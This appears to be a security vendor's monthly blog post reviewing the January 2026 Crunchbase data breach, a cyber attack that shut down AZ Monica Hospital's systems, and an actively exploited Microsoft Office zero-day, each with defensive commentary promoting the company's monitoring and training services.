Cybersecurity Insights series: January 2026 – this month in cybersecurity

Welcome back to our Cybersecurity Insights blog, where we break down the most impactful cyber events shaping today’s threat landscape. January 2026 began with significant turbulence across the digital ecosystem, highlighting once again how cybercriminals continue to exploit trust, technology, and operational dependencies across industries.

Craig Lusher examines three major incidents that captured attention this month.

Crunchbase breach: ShinyHunters exfiltrate over 2 million records

Market intelligence platform Crunchbase confirmed a substantial data breach after the ShinyHunters cybercrime group published a 400MB archive of compressed files and stolen data online. The attackers claim to have accessed over 2 million personal and corporate records, including PII, contracts, and internal documentation. The intrusion was part of a broader campaign that has also impacted platforms such as SoundCloud and Betterment.

Crunchbase reported that while business operations were not disrupted, a threat actor had exfiltrated “certain documents” from the corporate network and published them following a failed extortion attempt. The organisation is now working with federal authorities and cybersecurity experts to assess the scope of exposure.

C8 Secure perspective

Breaches of this nature almost always trace back to credential compromise or social engineering, and cloud-based SaaS platforms are particularly exposed when single sign-on environments are misconfigured or lack phishing-resistant MFA. The exfiltration of over 2 million records also suggests the attackers had sustained access before being detected, which points to gaps in monitoring for unusual data movement patterns. This is exactly the kind of activity that a well-tuned SIEM with behavioral analytics should catch, correlating authentication anomalies with abnormal data transfers before they reach this scale.

Our own M-SOC service integrates with over 800 external threat feeds for this reason, and our Cyber Threat Exchange gives customers in regulated industries early visibility into credential dumps and dark web activity that often precedes these campaigns. The voice-based social engineering element is also worth noting. Groups like ShinyHunters increasingly use vishing to bypass technical controls entirely, which is why we run tailored vishing and phishing simulations through our SafeBait program. Technology alone won’t solve this if staff aren’t prepared for the call that sounds entirely legitimate.

AZ Monica Hospital, Belgium: Ransomware disruption halts operations

Belgium’s AZ Monica Hospital suffered a severe cyber attack that forced the shutdown of all IT systems across its Antwerp and Deurne campuses. The incident caused widespread operational disruption, including the cancellation of scheduled surgeries, a halt to electronic patient records, and the transfer of critical-care patients to nearby hospitals with Red Cross support.

The hospital proactively shut down servers to contain the attack, resulting in reduced emergency department capacity and a temporary shift to manual processes for patient registration. Local reports suggest ransomware may be involved, though this has not been officially confirmed.

C8 Secure perspective

When an organization is forced to cancel surgeries and redirect patients, it is a reminder that ransomware is not just an IT problem but an operational and safety issue. The pattern here is familiar: attackers gain access, move laterally, and deploy encryption across production systems before anyone intervenes. The time between initial access and deployment is where defenders have the best opportunity to act, but only if monitoring is continuous and response is fast enough.

Our approach through the M-SOC combines 24/7 analyst coverage with automated containment through our SOAR platform, which can isolate compromised endpoints within seconds rather than waiting for manual escalation. At the endpoint level, behavioral detection is what matters most against ransomware, catching the encryption behavior itself rather than relying on known signatures. That said, detection is only half the picture. Many organizations discover during an incident that their network segmentation is inadequate, or their backup restoration process has never been properly tested. Regular security assessments and penetration testing help identify these weaknesses before an attacker does. Healthcare may have been the target here, but any organisation dependent on real-time system access faces the same risk profile.

Microsoft Office Zero-Day: Emergency patch issued amid active exploitation

Microsoft released an out-of-band emergency patch to address CVE-2026-21509, a high-severity zero-day vulnerability actively exploited in the wild. The flaw enables attackers to bypass critical COM/OLE security controls in Microsoft Office and Microsoft 365, allowing malicious documents to execute code once opened by a user.

Attackers must convince a victim to open a specially crafted Office file – typically delivered via highly targeted phishing or social engineering. While Office 2021 and later versions benefit from automatic server-side protections, users of Office 2016 and 2019 must apply patches manually or implement registry-based mitigations. The vulnerability has been added to CISA’s Known Exploited Vulnerabilities catalogue, with federal agencies required to patch by February 16, 2026.

C8 Secure perspective

Document-based attacks remain effective because they exploit something no patch can fully fix: the fact that people open Office attachments as part of their daily work. The attacker’s challenge is simply making the email convincing enough, and targeted social engineering has become very good at that. From a defensive standpoint, there are two things that matter here. First, endpoint protection needs to catch malicious macros and embedded payloads before they execute, not after. Machine learning-based detection that analyses document behavior pre-execution is more reliable than signature-based approaches for zero-day exploits like this one. Second, patching speed makes a real difference.

Organizations still running Office 2016 or 2019 face a manual patching burden that creates extended exposure windows, and our SOC analysts actively monitor for exploitation indicators tied to newly disclosed CVEs so that detection rules can be updated quickly. On the human side, regular simulation exercises that train staff to spot coercive or urgent email tactics reduce the likelihood of someone opening the malicious document in the first place. None of these measures work in isolation but taken together they significantly narrow the window of opportunity for this type of attack.

Final thoughts

January 2026 reinforces a familiar truth: cyber threats continue to evolve rapidly, targeting the intersection of human trust, critical infrastructure, and ubiquitous enterprise software. Whether it’s high-volume data exfiltration, operational disruption in life-critical environments, or targeted exploitation of widely deployed productivity tools, organisations must adopt layered defences, rapid detection and response capabilities, and resilient operational planning.

Cybersecurity solutions for a safer tomorrow

For more information on how C8 Secure can support your cybersecurity initiatives, email info@c8secure.com or fill out our Contact Us page.

Let’s Get Started